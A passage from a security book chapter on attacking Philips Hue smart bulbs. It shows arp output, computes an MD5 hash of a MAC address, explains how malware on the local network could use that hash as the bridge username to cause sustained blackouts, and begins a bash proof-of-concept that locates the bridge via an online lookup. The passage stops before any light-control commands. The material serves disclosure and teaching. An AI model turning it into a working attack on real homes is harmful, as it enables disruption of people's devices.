$ arp -a -n
? (172.20.0.1) at d4:ae:52:9d:1f:49 on en0 ifscope [ethernet]
? (172.20.0.23) at 7c:7a:91:33:be:a4 on en0 ifscope [ethernet]
? (172.20.0.52) at d8:a2:5e:4b:9a:50 on en0 ifscope [ethernet]
? (172.20.0.75) at 54:e4:3a:a6:4b:0e on en0 ifscope [ethernet]
? (172.20.0.90) at c8:f6:50:08:5f:e7 on en0 ifscope [ethernet]
? (172.20.0.154) at 74:e1:b6:9f:12:66 on en0 ifscope [ethernet]
Based on the output of the arp command, we can see the MAC addresses associated with
a particular device. For example, the device with the IP address of 172.20.0.90 has the MAC
address c8:f6:50:08:5f:e7.
The MD5 algorithm in use is known as a one-way hash. So, the MD5 hash of
c8:f6:50:08:5f:e7 can be computed with the md5 tool:
$ md5 -s "c8:f6:50:08:5f:e7"
MD5 ("c8:f6:50:08:5f:e7") = 4ad1c59ad3f1c4fcdd67a55ee8f80160
In this case, the MD5 hash of c8:f6:50:08:5f:e7 is and always will be
4ad1c59ad3f1c4fcdd67a55ee8f80160. Given the one-way nature of MD5, it is hard to reverse
engineer the MAC address back from the actual hash. However, imagine a situation in which
a device on the same network has been infected with a malicious program (also known as
malware) installed by an intruder. This malware can easily issue the arp command and quickly
compute the MD5 hash of each MAC address in the table. Then, in order to cause a blackout,
the malware simply has to connect to the hue bridge on the local network and use the hash as
the username to turn off the lights. This creates a situation in which arbitrary malware on any
device on the local network can directly connect to the bridge and continuously issue com-
mands to turn the lights off, causing a perpetual blackout.
Let’s imagine a proof-of-concept malware program written using the simple bash shell
available on most Unix and Linux hosts. First, the malicious script needs to locate the IP
address of the bridge:
while [ -z "$bridge_ip" ];
do
bridge_ip=($(curl --connect-timeout 5 -s https://www.meethue.com/api/nupnp
|awk '{match($0,/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/);
ip = substr($0,RSTART,RLENGTH); print ip}'))
# If no bridge is found, try again in 10 minutes
if [ -z "$bridge_ip" ];
then
sleep 600
fi
done
CHAPTER 1: LIGHTS OUT—HACKING WIRELESS LIGHTBULBS TO CAUSE SUSTAINED
(^26) BLACKOUTS